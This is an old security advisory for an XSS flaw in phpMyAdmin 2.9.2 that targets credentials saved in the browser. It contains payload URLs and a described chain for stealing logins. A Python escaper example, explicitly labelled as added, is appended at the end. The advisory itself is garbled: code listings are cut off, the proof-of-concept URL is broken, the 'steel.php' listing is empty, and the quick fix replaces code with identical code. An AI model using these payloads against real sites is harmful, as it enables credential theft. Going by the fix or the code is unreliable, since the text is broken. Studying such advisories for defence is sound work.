---------------------------------------------------------------------------------
                       Virtuax - Security without illusions
                                 www.virtuax.be
---------------------------------------------------------------------------------

Application:         phpMyAdmin
Vulnerable Versions: <= v2.9.2
Vulnerability:       XSS
Vendor:              http://www.phpmyadmin.net
Vendor Status:       notified
Found:               23-01-2007
Public Release Date: 07-02-2007
Last modified:       01-03-2007
Author:              AlFa
Reference:           http://www.virtuax.be/advisories/Advisory2-24012007.txt

=================================================================================
Special thanks to Ciri for coding that nice POC, testing and spell check =)
Shouts to RedFern, dreamer--, Shadow, r4n01 and the rest of the Virtuax Community!
=================================================================================

I. Background
-------------

"phpMyAdmin is a tool written in PHP intended to handle the administration of
MySQL over the Web. Currently it can create and drop databases, create/drop/alter
tables, delete/edit/add fields, execute any SQL statement, manage keys on fields,
manage privileges, export data into various formats and is available in 50
languages." by phpmyadmin.net

II. Vulnerability
-----------------

The XSS attack vector can be inserted in $db or $table. The catch is that the
attack variable must be submitted together with $token, otherwise it won't work.
That makes it quite useless for session stealing, but in combination with XSRF
and XSS it is possible to steal the username and password from unsuspecting
users when their credentials are stored in the browser password manager.

The code listed below is taken from phpMyAdmin 2.9.2 and may vary for older
versions.

[code=index.php (116-132)]
...
...
[/code]

[code=./libraries/common.lib.php (1395-1412)]
...
/**
 * escapes a string to be inserted as string a JavaScript block
 * enclosed by
 * this requires only to escape ' with \' and end of script block
 *
 * @uses    strtr()
 * @param   string  $string the string to be escaped
 * @return  string  the escaped string
 */
function PMA_escapeJsString($string)
{
    return strtr($string, array(
        '\\' => '\\\\',
        '\'' => '\\\'',
        "\n" => '\n',
        "\r" => '\r',
        ...
[/code]

... (uppercase) tag. After that we can write JavaScript or, if preferred, HTML,
e.g.:

http://phpmyadmin.example.com/index.php?token=$token&db/table=';[XSS]
http://phpmyadmin.example.com/index.php?token=$token&db/table=[HTML]

IIa. Affected Versions
----------------------

All versions >= 2.8.0 and < 2.10.x were tested and found vulnerable; presumably
some older versions are also vulnerable, but they were not tested.

Tested with browsers: FF 2.0, FF 1.5, IE 6.0 and Opera 9.10

III. POC
--------

The POC is pretty simple: just log in to phpMyAdmin, copy-paste the (modified)
URL below, and you will see the login form with your credentials filled in (if
you store them in your browser).

http://phpmyadmin.example.com/index.php?lang=en-utf-8&token=$token&db=';// ]]>
Log in
// 1000.

[code=steel.php]
[/code]

To really exploit this vulnerability is a little more difficult because of the
cookie authentication method used in phpMyAdmin. But in case the domain where
phpMyAdmin is hosted contains XSS holes, it isn't that hard to achieve. One could
connect to phpMyAdmin through sockets to obtain login information like the token
and cookie values, and then set the right cookies at the target by using the XSS
hole (on the same domain where phpMyAdmin is hosted) with JavaScript. Then you'll
just have to load the POC URL (in a frame) and that should do it.

And thanks to Michael Zalewski, an XSS isn't necessary anymore for FF < 2.0.2
(http://lcamtuf.dione.cc/ffhostname.html).

IV. Solution
------------

A. Quickfix

Replace this code (./libraries/common.lib.php (1406-1411)):

[code]
return strtr($string, array(
    '\\' => '\\\\',
    '\'' => '\\\'',
    "\n" => '\n',
    "\r" => '\r',
    ...
[/code]

with:

[code]
return strtr($string, array(
    '\\' => '\\\\',
    '\'' => '\\\'',
    "\n" => '\n',
    "\r" => '\r',
    ...
[/code]
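As an added example (not phpMyAdmin's code and not part of the original advisory), here is a JS-string escaper in Python that treats the mixed-case closing tag from this advisory as a test case: the weak variant mirrors the 2.9.2 strtr() table quoted above and is assumed to rewrite only the lowercase closing tag, while the hardened variant hex-escapes every character the HTML parser could read as markup, so a closing tag in any letter case can no longer end the script block. Function names and the sample $db values are constructed for the example.

```python
import re

# Weak escaper modelled on the 2.9.2 PMA_escapeJsString() strtr() table quoted in
# the advisory. Assumption: the entry lost from the quoted code rewrote only the
# lowercase '</script' sequence, which is why an upper-case closing tag survives.
# Backslash is replaced first so the escapes added later are not doubled.
WEAK_TABLE = [
    ("\\", "\\\\"),
    ("'", "\\'"),
    ("\n", "\\n"),
    ("\r", "\\r"),
    ("</script", "<\\/script"),  # assumed entry, case-sensitive
]

def escape_js_string_weak(value: str) -> str:
    for src, dst in WEAK_TABLE:
        value = value.replace(src, dst)
    return value

# Characters that can terminate a JS string literal, inject a line terminator,
# or be read by the HTML tokenizer as markup ('<', '>', '/', '&').
_DANGEROUS = re.compile(r"[\\'\"<>/&\x00-\x1f\u2028\u2029]")

def escape_js_string(value: str) -> str:
    """Hardened escaper: every dangerous character becomes a \\xNN or \\uNNNN
    escape, which JavaScript decodes but the HTML parser never sees as a tag.
    The result is safe inside a single- or double-quoted literal in an inline
    <script> block, whatever the letter case of a closing tag in the input."""
    def repl(match):
        code = ord(match.group(0))
        return f"\\x{code:02x}" if code < 0x100 else f"\\u{code:04x}"
    return _DANGEROUS.sub(repl, value)

_CLOSING_TAG = re.compile(r"</script", re.IGNORECASE)

def breaks_out_of_script_block(escaped: str) -> bool:
    """True if the escaped text still carries '</script' in any letter case.
    The HTML tokenizer ends the script element there regardless of how the
    surrounding JavaScript string is quoted, so this is the check to run over
    any escaper used for embedding values into inline scripts."""
    return _CLOSING_TAG.search(escaped) is not None

if __name__ == "__main__":
    # Constructed sample $db values, including the mixed-case closing tag the advisory describes.
    for sample in ("employees", "x' </script>", "x' </SCRIPT>"):
        for name, esc in (("weak", escape_js_string_weak), ("hardened", escape_js_string)):
            out = esc(sample)
            print(f"{name:8s} {sample!r:16s} -> {out!r}  leaves script block: {breaks_out_of_script_block(out)}")
```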